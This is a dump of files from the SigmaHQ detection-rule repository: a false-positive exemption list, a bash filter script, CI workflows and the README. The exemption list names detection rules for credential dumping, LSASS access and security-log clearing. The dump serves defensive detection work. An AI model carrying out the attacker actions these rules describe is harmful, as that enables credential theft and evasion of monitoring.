ccb5742c-c248-4982-8c5c-5571b9275ad3;Potential Suspicious Findstr.EXE Execution;httpd\.exe 9ae01559-cf7e-4f8e-8e14-4c290a1b4784;CredUI.DLL Load By Uncommon Process;Spotify\.exe 52182dfb-afb7-41db-b4bc-5336cb29b464;Suspicious File Download From File Sharing Websites;objects\.githubusercontent\.com ce72ef99-22f1-43d4-8695-419dcb5d9330;Suspicious Windows Service Tampering;TeamViewer 
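dae8171c-5ec6-4396-b210-8466585b53e9;SCM Database Privileged Operation;0x277c6
3ce8e9a4-bc61-4c9b-8e69-d7e2492a8781;OpenSSH Server Listening On Socket;.*
b69888d4-380c-45ce-9cf9-d9ce46e67821;Hidden Executable In NTFS Alternate Data Stream;.*
4a1b6da0-d94f-4fc3-98fc-2d9cb9e5ee76;Potentially Suspicious AccessMask Requested From LSASS;\\setup\.exe
d99b79d2-0a6f-4f46-ad8b-260b6e17f982;Security Eventlog Cleared;Computer: WinDevEval
b28e58e4-2a72-4fae-bdee-0fbe904db642;Windows Defender Real-time Protection Disabled;Computer: WinDev2310Eval
ef9dcfed-690c-4c5d-a9d1-482cd422225c;Browser Execution In Headless Mode;.*
65236ec7-ace0-4f0c-82fd-737b04fd4dcb;EVTX Created In Uncommon Location;Computer: (DESKTOP-6D0DBMB|WinDev2310Eval)
de587dce-915e-4218-aac4-835ca6af6f70;Potential Persistence Attempt Via Run Keys Using Reg.EXE;\\Discord\\
24357373-078f-44ed-9ac4-6d334a668a11;Direct Autorun Keys Modification;Discord\.exe
8fbf3271-1ef6-4e94-8210-03c2317947f6;Cred Dump Tools Dropped Files;Svchost\.exe
c7da8edc-49ae-45a2-9e61-9fd860e4e73d;PUA - Sysinternals Tools Execution - Registry;.*
dcff7e85-d01f-4eb5-badd-84e2e6be8294;Windows Default Domain GPO Modification via GPME;Computer: WIN-FPV0DSIC9O6.sigma.fr
416bc4a2-7217-4519-8dc7-c3271817f1d5;Suspicious Loading of Dbgcore/Dbghelp DLLs from Uncommon Location;procexp64\.exe
5a6b7c8d-9e0f-1a2b-3c4d-5e6f7a8b9c0d;Cmd Launched with Hidden Start Flags to Suspicious Targets;xampp
558eebe5-f2ba-4104-b339-36f7902bcc1a;File Creation Date Changed to Another Year;(\\target\.exe|thm\.wxl|\\AppData\\Local\\Temp\\)
5e993621-67d4-488a-b9ae-b420d08b96cb;Service Installation in Suspicious Folder;\\\\AppData\\\\Local\\\\Temp\\\\MBAMInstallerService\.exe
================================================
FILE: .github/workflows/matchgrep.sh
================================================
#!/bin/bash
# Filter evtx-sigma-checker findings (one JSON object per line) against the accepted
# false positives in known-FPs.csv and fail when anything is left over.
#
# Usage: matchgrep.sh findings.json known-FPs.csv
#
# known-FPs.csv: one header line, then "RuleId;RuleName;MatchString" rows. RuleName is
# informational only. MatchString is an extended, case-insensitive regex that has to
# match somewhere after the "RuleId":"<id>" field of a finding's JSON line for that
# finding to be dropped. The CSV is a trusted, repository-controlled input: its patterns
# are interpolated into grep expressions unescaped.
#
# Exit codes: 0 nothing left over, 1 usage error, 2 unreadable input file,
#             3 unexpected findings remain (details on stderr, JSON lines on stdout).
set -u

infile=${1:-}
fps=${2:-}
if [[ -z ${infile} || -z ${fps} ]]; then
  >&2 echo "usage: $0 [json-file] [FPs.csv]"
  exit 1
fi
if [[ ! -f ${infile} || ! -r ${infile} ]]; then
  >&2 echo "${infile} is not a valid, readable file"
  exit 2
fi
if [[ ! -f ${fps} || ! -r ${fps} ]]; then
  >&2 echo "${fps} is not a valid, readable file"
  exit 2
fi

# Exclude all rules with level "low"
findings=$(grep -v '"RuleLevel":"low"' "${infile}")

{
  read -r # Skip CSV header
  while IFS=\; read -r id _name fpstring; do
    # A CSV saved with CRLF line endings would otherwise carry a trailing "\r" into every
    # pattern and silently disable every filter; blank lines and "#" comments are skipped.
    id=${id%$'\r'}
    fpstring=${fpstring%$'\r'}
    if [[ -z ${id} || ${id} == \#* ]]; then
      continue
    fi
    # Drop every finding for this rule id whose line also matches the FP pattern.
    findings=$(echo "${findings}" | grep -iEv "\"RuleId\":\"${id}\".*${fpstring}")
  done
} < "${fps}"

if [[ -z ${findings} ]]; then
  echo "No matches found."
else
  >&2 echo "Found matches:"
  echo "${findings}"
  >&2 echo
  >&2 echo "Match overview:"
  # Count the remaining findings per rule so the noisiest rule is listed first.
  echo "${findings}" | jq -c '. | {RuleId, RuleTitle, RuleLevel}' | sort | uniq -c | sort -nr >&2
  >&2 echo
  >&2 echo "You either need to tune your rule(s) for false positives or add a false positive filter to .github/workflows/known-FPs.csv"
  exit 3
fi
================================================
FILE: .github/workflows/pr-labeler.yml
================================================
# Applies labels from .github/labeler.yml to newly opened pull requests.
#
# pull_request_target runs in the context of the base branch with a write-capable
# GITHUB_TOKEN, also for pull requests from forks. Keep this job free of any checkout
# or execution of the pull request's own code; the labeler action does not need one.
on:
  pull_request_target:
    types:
      - opened

name: PR Labeler Workflow

jobs:
  triage:
    permissions:
      contents: read
      pull-requests: write
    runs-on: ubuntu-latest
    steps:
      - uses: actions/labeler@v6
================================================
FILE: .github/workflows/ref-archiver.yml
================================================
# Twice a month, archive newly added rule references (tests/reference-archiver.py) and
# open a pull request that updates the archive cache file.
name: "Reference Archiver"

on:
  #push:
  #  branches:
  #    - "*"
  schedule:
    - cron: "30 1 1,15 * *" # At 01:30 on day-of-month 1 and 15.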
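# Allows you to run this workflow manually from the Actions tab
  workflow_dispatch:

# Least privilege: pushing the bot branch and opening the pull request is all that
# peter-evans/create-pull-request needs from GITHUB_TOKEN.
permissions:
  contents: write
  pull-requests: write

jobs:
  archive:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v5
        with:
          submodules: true
      - name: Set up Python 3.11
        uses: actions/setup-python@v6
        with:
          python-version: 3.11
      - name: Execute Reference Archiver
        # argparse is part of the Python standard library; the PyPI package of the same
        # name is an unrelated legacy backport, so it is no longer pulled in here.
        # NOTE(review): PyYAML and requests are installed unpinned from PyPI at run time.
        run: |
          pip install PyYAML requests
          python tests/reference-archiver.py
      - name: Create Pull Request
        # Same major version as sigma-rule-deprecated.yml so both bot-PR workflows behave alike.
        uses: peter-evans/create-pull-request@v7
        with:
          reviewers: nasbench, frack113, phantinuss
          delete-branch: true
          branch: 'create-pull-request/reference-archiver'
          commit-message: 'chore: archive new rule references and update cache file'
          title: 'Archive New Rule References'
          body: |
            ### Summary of the Pull Request
            This PR update the cache file used to save already archived references with newly archived results
            ### Changelog
            chore: archive new rule references and update cache file
            ### Example Log Event
            N/A
            ### Fixed Issues
            N/A
            ### SigmaHQ Rule Creation Conventions
            - If your PR adds new rules, please consider following and applying these [conventions](https://github.com/SigmaHQ/sigma-specification/blob/main/sigmahq/sigmahq_conventions.md)
================================================
FILE: .github/workflows/regression-tests.yml
================================================
# Runs tests/regression_tests_runner.py (job "true-positive-tests") over the three rule
# directories using the evtx-sigma-checker binary and the THOR log-source mapping.
name: Regression Tests

on: [push, pull_request, workflow_dispatch]

# Least privilege: the job only reads the checkout and downloads a public release asset.
permissions:
  contents: read

env:
  # Release tag of NextronSystems/evtx-baseline from which the checker binary is downloaded.
  EVTX_BASELINE_VERSION: v0.8.4

jobs:
  true-positive-tests:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v5
      - name: Set up Python
        uses: actions/setup-python@v6
        with:
          python-version: '3.11'
      - name: Install Python dependencies
        run: |
          python -m pip install --upgrade pip
          pip install pyyaml
      - name: Download evtx-sigma-checker
        # NOTE(review): the binary is fetched by release tag without any checksum or
        # signature verification before it is made executable and run. Pinning an expected
        # sha256 and checking it with `sha256sum -c` would close that gap.
        run: |
          wget --no-verbose https://github.com/NextronSystems/evtx-baseline/releases/download/$EVTX_BASELINE_VERSION/evtx-sigma-checker
          chmod +x evtx-sigma-checker
      - name: Run regression tests
        run: |
          python tests/regression_tests_runner.py --rules-paths rules rules-emerging-threats rules-threat-hunting --evtx-checker ./evtx-sigma-checker --thor-config tests/thor.yml --ignore-validation
================================================
FILE: .github/workflows/release.yml
================================================
# On every "r*" tag: build the changelog from commit-message prefixes, build the rule
# packages and create a DRAFT GitHub release with them attached. A maintainer still has
# to review and publish the draft.
on:
  push:
    tags:
      - 'r*'

name: Create Release

# Least privilege: creating the release and uploading its assets needs contents: write;
# nothing else in this workflow touches the API.
permissions:
  contents: write

jobs:
  build:
    name: Create Release
    runs-on: ubuntu-latest
    steps:
      - name: Checkout code
        uses: actions/checkout@v5
        with:
          # Full history is required so the commit range between the two tags can be walked.
          fetch-depth: 0
      - name: Generate Changelog
        # prev_tag is the second-newest "r*" tag by creation date and curr_tag the newest;
        # this assumes the tag that triggered the run is the newest r* tag in the clone.
        # Sections come from "new:", "update:", "remove:" and "fix:" commit-message lines;
        # authors from "Merge PR #N from @user" lines, Co-authored-by trailers and
        # "Thanks: ..." lines (dependabot is excluded).
        run: |
          prev_tag=$(git for-each-ref --sort=creatordate --format '%(refname:lstrip=2)' refs/tags | grep ^r | tail -2 | head -1)
          curr_tag=$(git for-each-ref --sort=creatordate --format '%(refname:lstrip=2)' refs/tags | grep ^r | tail -1)
          echo "Previous tag: ${prev_tag}"
          echo "Current tag: ${curr_tag}"
          if [[ $(git log --pretty=%B ${prev_tag}..${curr_tag} | grep -E '^\s*new: ' -c) -gt 0 ]]; then echo "### New Rules" > changes.txt; fi
          git log --pretty=%B ${prev_tag}..${curr_tag} | grep -E '^\s*new: ' | sort -u | sed -e 's%^% - %' >> changes.txt
          if [[ $(git log --pretty=%B ${prev_tag}..${curr_tag} | grep -E '^\s*update: ' -c) -gt 0 ]]; then echo "### Updated Rules" >> changes.txt; fi
          git log --pretty=%B ${prev_tag}..${curr_tag} | grep -E '^\s*update: ' | sort -u | sed -e 's%^% - %' >> changes.txt
          if [[ $(git log --pretty=%B ${prev_tag}..${curr_tag} | grep -E '^\s*remove: ' -c) -gt 0 ]]; then echo "### Removed / Deprecated Rules" >> changes.txt; fi
          git log --pretty=%B ${prev_tag}..${curr_tag} | grep -E '^\s*remove: ' | sort -u | sed -e 's%^% - %' >> changes.txt
          if [[ $(git log --pretty=%B ${prev_tag}..${curr_tag} | grep -E '^\s*fix: ' -c) -gt 0 ]]; then echo "### Fixed Rules" >> changes.txt; fi
          git log --pretty=%B ${prev_tag}..${curr_tag} | grep -E '^\s*fix: ' | sort -u | sed -e 's%^% - %' >> changes.txt
          git log --pretty=%B ${prev_tag}..${curr_tag} | grep -ioP 'Merge PR #\d+ from \K(@\S+)' | sort -u > authors_raw.txt
          git log --pretty=%B ${prev_tag}..${curr_tag} | grep -oP "Co-authored-by: \K.*(?= <)" | sort -u | sed -e 's%^%@%' >> authors_raw.txt
          git log --pretty=%B ${prev_tag}..${curr_tag} | grep -ioP "Thanks: \K.*?(?=$| for)" | sort -u >> authors_raw.txt
          LC_ALL=en_US.UTF-8 sort -u authors_raw.txt | grep -v 'dependabot\[bot\]' > authors.txt
          cat changes.txt >> changelog.txt
          echo "" >> changelog.txt
          echo "### Acknowledgement" >> changelog.txt
          echo "Thanks to $(perl -pe 's%\n%, %' authors.txt | sed 's%, $%%') for their contribution to this release" >> changelog.txt
          echo "" >> changelog.txt
          echo "" >> changelog.txt
          echo "### Which Sigma rule package should I use?" >> changelog.txt
          echo "A detailed explanation can be found in the [Releases.md](Releases.md) file. If you are new to Sigma, we recommend starting with the \"Core\" ruleset." >> changelog.txt
          echo "" >> changelog.txt
          echo "The [latest release package on GitHub](https://docs.github.com/en/repositories/releasing-projects-on-github/linking-to-releases#linking-to-the-latest-release) can always be found [here](https://github.com/SigmaHQ/sigma/releases/latest)." >> changelog.txt
          cat changelog.txt
      - name: Build all release packages
        # Packages differ by minimum rule status/level and by rule type (generic vs. et).
        run: |
          python3 tests/sigma-package-release.py --min-status test --min-level high --rule-types generic --outfile sigma_core.zip
          python3 tests/sigma-package-release.py --min-status test --min-level medium --rule-types generic --outfile sigma_core+.zip
          python3 tests/sigma-package-release.py --min-status experimental --min-level medium --rule-types generic --outfile sigma_core++.zip
          python3 tests/sigma-package-release.py --min-status experimental --min-level medium --rule-types et --outfile sigma_emerging_threats_addon.zip
          python3 tests/sigma-package-release.py --min-status experimental --min-level medium --rule-types generic et --outfile sigma_all_rules.zip
      - name: Create Release with Assets
        id: create_release
        uses: softprops/action-gh-release@v2
        with:
          tag_name: ${{ github.ref }}
          name: Release ${{ github.ref_name }}
          body_path: changelog.txt
          token: ${{ secrets.GITHUB_TOKEN }}
          # Draft: nothing is published until a maintainer reviews the generated changelog.
          draft: true
          prerelease: false
          files: |
            sigma_core.zip
            sigma_core+.zip
            sigma_core++.zip
            sigma_emerging_threats_addon.zip
            sigma_all_rules.zip
================================================
FILE: .github/workflows/sigma-rule-deprecated.yml
================================================
# Monthly: regenerate deprecated/deprecated.csv and deprecated.json from the rules marked
# deprecated and open a pull request with the result.
name: "Create deprecated summary"

on:
  #push:
  #  branches:
  #    - "*"
  schedule:
    - cron: "0 0 1 * *" # At 00:00 on day-of-month 1.
  # Allows you to run this workflow manually from the Actions tab
  workflow_dispatch:

# Least privilege: pushing the bot branch and opening the pull request is all that
# peter-evans/create-pull-request needs from GITHUB_TOKEN.
permissions:
  contents: write
  pull-requests: write

jobs:
  pull-master:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v5
        with:
          submodules: true
      - name: Set up Python 3.11
        uses: actions/setup-python@v6
        with:
          python-version: 3.11
      - name: Execute deprecated rules script
        # NOTE(review): pySigma is installed unpinned from PyPI at run time.
        run: |
          pip install pySigma
          python tests/deprecated_rules.py --format csv
          python tests/deprecated_rules.py --format json
      - name: Create Pull Request
        uses: peter-evans/create-pull-request@v7
        with:
          reviewers: nasbench, frack113, phantinuss
          delete-branch: true
          commit-message: 'chore: update deprecated csv'
          branch: 'create-pull-request/rule-deprecated'
          title: 'Update deprecated.csv'
          body: |
            ### Summary of the Pull Request
            This PR updates the deprecated summary file `deprecated.csv` and `deprecated.json`
            ### Changelog
            chore: update deprecated.csv and deprecated.json
            ### Example Log Event
            N/A
            ### Fixed Issues
            N/A
            ### SigmaHQ Rule Creation Conventions
            - If your PR adds new rules, please consider following and applying these [conventions](https://github.com/SigmaHQ/sigma-specification/tree/main/sigmahq)
================================================
FILE: .github/workflows/sigma-rule-promoter.yml
================================================
#name: "Promote Experimental Rules To Test"
#
#on:
#  #push:
#  #  branches:
#  #    - "*"
#  schedule:
#    - cron: "0 0 1 * *" # At 00:00 on day-of-month 1.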
# # # Allows you to run this workflow manually from the Actions tab # workflow_dispatch: # #jobs: # pull-master: # runs-on: ubuntu-latest # steps: # - uses: actions/checkout@v5 # with: # submodules: true # - name: Set up Python 3.11 # uses: actions/setup-python@v6 # with: # python-version: 3.11 # - name: Execute Rule Promoter Script # run: | # pip install pySigma # python tests/promote_rules_status.py # - name: Create Pull Request # uses: peter-evans/create-pull-request@v7 # with: # reviewers: nasbench, frack113, phantinuss # delete-branch: true # commit-message: 'chore: promote older rules status from `experimental` to `test`' # branch: 'create-pull-request/rule-promotion' # title: 'Promote Older Rules From `experimental` to `test`' # body: | # ### Summary of the Pull Request # # This PR promotes and upgrade the status of rules that haven't been changed for over 300 days from `experimental` to `test` # # ### Changelog # # chore: promote older rules status from `experimental` to `test` # # ### Example Log Event # # N/A # # ### Fixed Issues # # N/A # # ### SigmaHQ Rule Creation Conventions # # - If your PR adds new rules, please consider following and applying these [conventions](https://github.com/SigmaHQ/sigma-specification/blob/main/sigmahq/sigmahq_conventions.md) # ================================================ FILE: .github/workflows/sigma-test.yml ================================================ # This workflow will install Python dependencies, run tests and lint with a single version of Python # For more information see: https://help.github.com/actions/language-and-framework-guides/using-python-with-github-actions name: Sigma Rule Tests on: [push, pull_request, merge_group, workflow_dispatch] jobs: yamllint: runs-on: ubuntu-latest steps: - uses: actions/checkout@v5 - name: yaml-lint uses: ibiqlik/action-yamllint@v3 with: strict: true # fail on warnings as well test-sigma-logsource: runs-on: ubuntu-latest needs: yamllint steps: - uses: actions/checkout@v5 
with: submodules: true - name: Set up Python 3.11 uses: actions/setup-python@v6 with: python-version: 3.11 - name: Test Sigma logsource run: | pip install PyYAML colorama python tests/test_logsource.py test-sigma-legacy: runs-on: ubuntu-latest needs: yamllint steps: - uses: actions/checkout@v5 with: submodules: true - name: Set up Python 3.11 uses: actions/setup-python@v6 with: python-version: 3.11 - name: Test Sigma Rules run: | pip install PyYAML colorama python tests/test_rules.py sigma-check: runs-on: ubuntu-latest needs: yamllint steps: - uses: actions/checkout@v5 with: submodules: true - name: Set up Python 3.11 uses: actions/setup-python@v6 with: python-version: 3.11 - name: Install dependencies run: | pip install pysigma pip install sigma-cli pip install pySigma-validators-sigmahq==0.20.* - name: Test Sigma Rule Syntax run: | sigma check --fail-on-error --fail-on-issues --validation-config tests/sigma_cli_conf.yml rules* duplicate-id-check: runs-on: ubuntu-latest needs: yamllint steps: - uses: actions/checkout@v5 with: submodules: true - name: Check for duplicate IDs shell: /usr/bin/bash {0} # Use bash without -e to enable exit code manipulation run: | grep -rh "^id: " rules* deprecated unsupported | sort | uniq -c | grep -vE "^\s+1 id: "; exit $(( $? 
^ 1 )) ================================================ FILE: .github/workflows/sigma-validation.yml ================================================ name: Validate Sigma rules on: [push, pull_request, merge_group, workflow_dispatch] jobs: sigma-rules-validator: runs-on: ubuntu-latest steps: - name: Validate Sigma rules uses: SigmaHQ/sigma-rules-validator@v1 with: paths: |- ./rules ./rules-compliance ./rules-dfir ./rules-emerging-threats ./rules-placeholder ./rules-threat-hunting schemaFile: ${{ github.workspace }}/tests/validate-sigma-schema/sigma-schema.json ================================================ FILE: .github/workflows/update-heatmap.yml ================================================ name: Generate Updated ATT&CK Heatmap on: schedule: - cron: "0 0 1 * *" workflow_dispatch: jobs: generate-heatmap: runs-on: ubuntu-latest steps: - name: Checkout Repository uses: actions/checkout@v5 with: submodules: true - name: Install Sigma run: pipx install sigma-cli - name: Update Heatmap run: sigma analyze attack count --min-score 0 --max-score 20 --min-color '#66b1ffff' --max-color '#ff66f4ff' ./other/sigma_attack_nav_coverage.json rule* - name: Create Pull Request uses: peter-evans/create-pull-request@v7 with: reviewers: nasbench, frack113, phantinuss delete-branch: true commit-message: 'chore: update ATT&CK heatmap' branch: 'create-pull-request/update-heatmap' title: 'Update ATT&CK Heatmap Coverage' body: | ### Summary of the Pull Request This PR updates sigma_attack_nav_coverage.json to reflect the current rule coverage. To generate a new SVG file, go to the [MITRE ATT&CK Navigator](https://mitre-attack.github.io/attack-navigator/#layerURL=https://raw.githubusercontent.com/SigmaHQ/sigma/master/other/sigma_attack_nav_coverage.json) and export a SVG via "Layer Controls" > "Export" (download icon) > "render layer to SVG". 
### Changelog chore: update ATT&CK heatmap ### Example Log Event N/A ### Fixed Issues N/A ### SigmaHQ Rule Creation Conventions - If your PR adds new rules, please consider following and applying these [conventions](https://github.com/SigmaHQ/sigma-specification/blob/main/sigmahq/sigmahq_conventions.md) ================================================ FILE: .gitignore ================================================ # Byte-compiled / optimized / DLL files __pycache__/ *.py[cod] *$py.class # C extensions *.so # Distribution / packaging .Python env/ build/ develop-eggs/ dist/ downloads/ eggs/ .eggs/ lib/ lib64/ parts/ sdist/ var/ *.egg-info/ .installed.cfg *.egg # PyInstaller # Usually these files are written by a python script from a template # before PyInstaller builds the exe, so as to inject date/other infos into it. *.manifest *.spec # Installer logs pip-log.txt pip-delete-this-directory.txt # Unit test / coverage reports htmlcov/ .tox/ .coverage .coverage.* .cache nosetests.xml coverage.xml *,cover .hypothesis/ # Translations *.mo *.pot # Django stuff: *.log local_settings.py # Flask stuff: instance/ .webassets-cache # MacOS Finder .DS_Store # Scrapy stuff: .scrapy # Sphinx documentation docs/_build/ # PyBuilder target/ # IPython Notebook .ipynb_checkpoints # pyenv .python-version # celery beat schedule file celerybeat-schedule # dotenv .env # virtualenv venv/ ENV/ # Spyder project settings .spyderproject # Rope project settings .ropeproject # vi(m) *.swp settings.json # VisualStudio .vs/ .vscode/launch.json # sigma2attack heatmap.json ================================================ FILE: .yamllint ================================================ # https://yamllint.readthedocs.io/en/latest/configuration.html extends: default ignore: - .github/ - deprecated/ - other/godmode_sigma_rule.yml - tests/ - unsupported/ rules: comments: require-starting-space: true min-spaces-from-content: 1 comments-indentation: disable document-start: {present: false} empty-lines: 
{max: 2, max-start: 2, max-end: 2} indentation: {spaces: 4, indent-sequences: whatever} line-length: disable new-line-at-end-of-file: enable trailing-spaces: {} ================================================ FILE: CONTRIBUTING.md ================================================ # Contributing to Sigma 🧙‍♂️ First off, thank you for considering contributing to Sigma! Your help is invaluable in keeping this project up-to-date and useful for the community. The following guidelines will help you understand how to contribute effectively. ## 📝 Reporting False Positives Or Proposing New Detection Rule Ideas 🔎 If you find a false positive or would like to propose a new detection rule idea but do not have the time to create one, please create a new issue on the [GitHub repository](https://github.com/SigmaHQ/sigma/issues/new/choose) by selecting one of the available templates. ## 🛠️ Submitting Pull Requests (PRs) 1. Fork the [SigmaHQ repository](https://github.com/SigmaHQ/sigma) and clone your fork to your local machine. 2. Create a new branch for your changes: ```bash git checkout -b your-feature-branch ``` 3. Make your changes, and test them: ```bash python tests/test_logsource.py python tests/test_rules.py ``` 4. Once the test is successful, commit the changes to your branch: ```bash git add . git commit -m "Your commit message" ``` 5. Push your changes to your fork: ```bash git push origin your-feature-branch ``` 6. Create a new Pull Request (PR) against the upstream repository: * Go to the [Sigma repository](https://github.com/SigmaHQ/sigma) on GitHub * Click the "New Pull Request" button * Choose your fork and your feature branch * Add a clear and descriptive title and a detailed description of your changes * Submit the Pull Request ## 📚 Adding or Updating Detection Rules To update or contribute a new rule please make sure to follow the guidelines in the [SigmaHQ conventions documents](https://github.com/SigmaHQ/sigma-specification/blob/main/sigmahq). 
Consider installing the [VsCode Sigma Extension](https://marketplace.visualstudio.com/items?itemName=humpalum.sigma) for auto completion and quality of life features. Thank you for contributing to Sigma! 🧙‍♂️ ================================================ FILE: LICENSE ================================================ # Licenses The content of this repository is released under the following licenses: - The Sigma specification (https://github.com/SigmaHQ/sigma-specification) and the Sigma logo are public domain - The rules contained in the SigmaHQ repository (https://github.com/SigmaHQ) are released under the [Detection Rule License (DRL) 1.1](https://github.com/SigmaHQ/Detection-Rule-License) ================================================ FILE: README.md ================================================ # Sigma - Generic Signature Format for SIEM Systems


Sigma Logo


Sigma Build Status Sigma Official Badge GitHub Repo stars GitHub all releases
Open Source Security Index - Fastest Growing Open Source Security Projects

Welcome to the Sigma main rule repository. The place where detection engineers, threat hunters and all defensive security practitioners collaborate on detection rules. The repository offers more than 3000 detection rules of different types and aims to make reliable detections accessible to all at no cost. Currently the repository offers the following types of rules: * [Generic Detection Rules](./rules/) - Are threat agnostic; their aim is to detect a behavior or an implementation of a technique or procedure that was, can or will be used by a potential threat actor. * [Threat Hunting Rules](./rules-threat-hunting/) - Are broader in scope and are meant to give the analyst a starting point to hunt for potentially suspicious or malicious activity * [Emerging Threat Rules](./rules-emerging-threats/) - Are rules that cover specific threats that are timely and relevant for certain periods of time. These threats include specific APT campaigns, exploitation of Zero-Day vulnerabilities, specific malware used during an attack,...etc. * [Compliance Rules](./rules-compliance/) - Are rules that help you identify compliance violations based on well known security frameworks such as CIS Controls, NIST, ISO 27001,...etc. * [Placeholder Rules](./rules-placeholder/) - Are rules that get their final meaning at conversion or usage time of the rule. ## Explore Sigma To start exploring the Sigma ecosystem, please visit the official website [sigmahq.io](https://sigmahq.io) ### What is Sigma Sigma is a generic and open signature format that allows you to describe relevant log events in a straightforward manner. The rule format is very flexible, easy to write and applicable to any type of log file. The main purpose of this project is to provide a structured form in which researchers or analysts can describe the detection methods they have developed and make them shareable with others. 
Sigma is for log files what [Snort](https://www.snort.org/) is for network traffic and [YARA](https://github.com/VirusTotal/yara) is for files. Sigma Description - A diagram showing Yaml Files (Sigma Rules) moving through a Sigma Convertor, and coming out as many SIEM logos, showing how Sigma rules can be converted to many different available SIEM query languages ### Why Sigma Today, everyone collects log data for analysis. People start working on their own, processing numerous white papers, blog posts and log analysis guidelines, extracting the necessary information and building their own searches and dashboards. Some of their searches and correlations are great and very useful but they lack a standardized format in which they can share their work with others. Others provide excellent analyses, include IOCs and YARA rules to detect the malicious files and network connections, but have no way to describe a specific or generic detection method in log events. Sigma is meant to be an open standard in which such detection mechanisms can be defined, shared and collected in order to improve the detection capabilities for everyone. ### 🌟 Key Features * A continuously growing list of detection and hunting rules, peer reviewed by a community of professional Detection Engineers. * Vendor agnostic detection rules. * Easily shareable across communities and reports ## 🏗️ Rule Creation To start writing Sigma rules please check the following high level guide along with the sigma specification: * [Rule Creation High‐Level Guide](https://github.com/SigmaHQ/sigma/wiki/Rule-Creation-High%E2%80%90Level-Guide) * [Sigma Specification](https://github.com/SigmaHQ/sigma-specification) ## 🔎 Contributing & Making PRs Please refer to the [CONTRIBUTING](./CONTRIBUTING.md) guide for detailed instructions on how you can start contributing new rules. 
## 📦 Rule Packages You can download the latest rule packages from the [release page](https://github.com/SigmaHQ/sigma/releases/latest) and start leveraging Sigma rules today. ## 🧬 Rule Usage and Conversion * You can start converting Sigma rules today using [Sigma CLI](https://github.com/SigmaHQ/sigma-cli) or [sigconverter.io](https://sigconverter.io) the GUI interface * To integrate Sigma rules in your own toolchain or products use [pySigma](https://github.com/SigmaHQ/pySigma). ## 🚨 Reporting False Positives or New Rule Ideas If you find a false positive or would like to propose a new detection rule idea but do not have the time to create one, please create a new issue on the [GitHub repository](https://github.com/SigmaHQ/sigma/issues/new/choose) by selecting one of the available templates. ## 📚 Resources & Further Reading * [Hack.lu 2017 Sigma - Generic Signatures for Log Events by Thomas Patzke](https://www.youtube.com/watch?v=OheVuE9Ifhs) * [MITRE ATT&CK® and Sigma Alerting SANS Webcast Recording](https://www.sans.org/webcasts/mitre-att-ck-sigma-alerting-110010 "MITRE ATT&CK® and Sigma Alerting") * [Sigma - Generic Signatures for SIEM Systems by Florian Roth](https://www.slideshare.net/secret/gvgxeXoKblXRcA) ## Projects or Products that use or integrate Sigma rules * [AlphaSOC](https://docs.alphasoc.com/detections_and_findings/sigma_community/) - Leverages Sigma rules to increase coverage across all supported log sources * [alterix](https://github.com/mtnmunuklu/alterix) - Converts Sigma rules to the query language of CRYPTTECH's SIEM * [AttackIQ](https://www.attackiq.com/2024/01/10/sigmaiq-attackiqs-latest-innovation-for-actionable-detections/) - Sigma Rules integrated in AttackIQ's platform, and [SigmAIQ](https://github.com/AttackIQ/SigmAIQ) for Sigma rule conversion and LLM apps * [Atomic Threat Coverage](https://github.com/atc-project/atomic-threat-coverage) (Since December 2018) * [AttackRuleMap - Mapping of Atomic Red Team tests and Sigma 
Rules](https://attackrulemap.com/) * [Confluent Sigma](https://github.com/confluentinc/confluent-sigma) - Kafka Streams supported Sigma rules * [Detection Studio](https://detection.studio/?ref=sigmahq_readme) - Convert Sigma rules to any supported SIEM. * [IBM QRadar](https://community.ibm.com/community/user/security/blogs/gladys-koskas1/2023/08/02/qradar-natively-supports-sigma-for-rules-creation) * [Impede Detection Platform](https://impede.ai/) * [Joe Sandbox](https://www.joesecurity.org/blog/8225577975210857708) * [LimaCharlie](https://limacharlie.io/) * [MISP](http://www.misp-project.org/2017/03/26/MISP.2.4.70.released.html) (Since Version 2.4.70, March 2017) * [Nextron's Aurora Agent](https://www.nextron-systems.com/aurora/) * [Nextron's THOR Scanner](https://www.nextron-systems.com/thor/) - Scan with Sigma rules on endpoints * [RANK VASA](https://globenewswire.com/news-release/2019/03/04/1745907/0/en/RANK-Software-to-Help-MSSPs-Scale-Cybersecurity-Offerings.html) * [Saeros](https://github.com/Saeros-Security/Saeros) * [Security Onion](https://docs.securityonion.net/en/latest/sigma.html) * [Sekoia.io XDR](https://www.sekoia.io) - XDR supporting Sigma and Sigma Correlation rules languages * [sigma2stix](https://github.com/muchdogesec/sigma2stix) - Converts the entire SigmaHQ Ruleset into STIX 2.1 Objects. * A versioned archive of sigma2stix STIX 2.1 data is also available to [download here](https://github.com/muchdogesec/cti_knowledge_base_store/tree/main/sigma-rules). 
* [SIΣGMA](https://github.com/3CORESec/SIEGMA) - SIEM consumable generator that utilizes Sigma for query conversion * [SOC Prime](https://my.socprime.com/sigma/) * [TA-Sigma-Searches](https://github.com/dstaulcu/TA-Sigma-Searches) (Splunk App) * [TimeSketch](https://github.com/google/timesketch/commit/0c6c4b65a6c0f2051d074e87bbb2da2424fa6c35) * [ypsilon](https://github.com/P4T12ICK/ypsilon) - Automated Use Case Testing ## 📜 Maintainers * [Nasreddine Bencherchali (@nas_bench)](https://twitter.com/nas_bench) * [Florian Roth (@cyb3rops)](https://twitter.com/cyb3rops) * [Christian Burkard (@phantinuss)](https://twitter.com/phantinuss) * [François Hubaut (@frack113)](https://twitter.com/frack113) * [Thomas Patzke (@blubbfiction)](https://twitter.com/blubbfiction) ## Credits This project would've never reached this height without the help of the hundreds of contributors. Thanks to all past and present contributors for their help. ## Licenses The content of this repository is released under the [Detection Rule License (DRL) 1.1](https://github.com/SigmaHQ/Detection-Rule-License). ================================================ FILE: Releases.md ================================================ This following document describes the different types of rule packages provided with every release. ## Package Introduction The rule packages provided with every release are split based on the [status](https://github.com/SigmaHQ/sigma-specification/blob/main/Sigma_specification.md#status-optional), [level](https://github.com/SigmaHQ/sigma-specification/blob/main/Sigma_specification.md#level) and [type](https://medium.com/sigma-hq/sigma-rule-repository-enhancements-new-folder-structure-rule-types-30adb70f5e10) of a sigma rule. There are currently 3 main rule types provided in the sigma repository: - **core/generic**: Rules that match on attacker techniques. These rules are timeless and often match on new threats. 
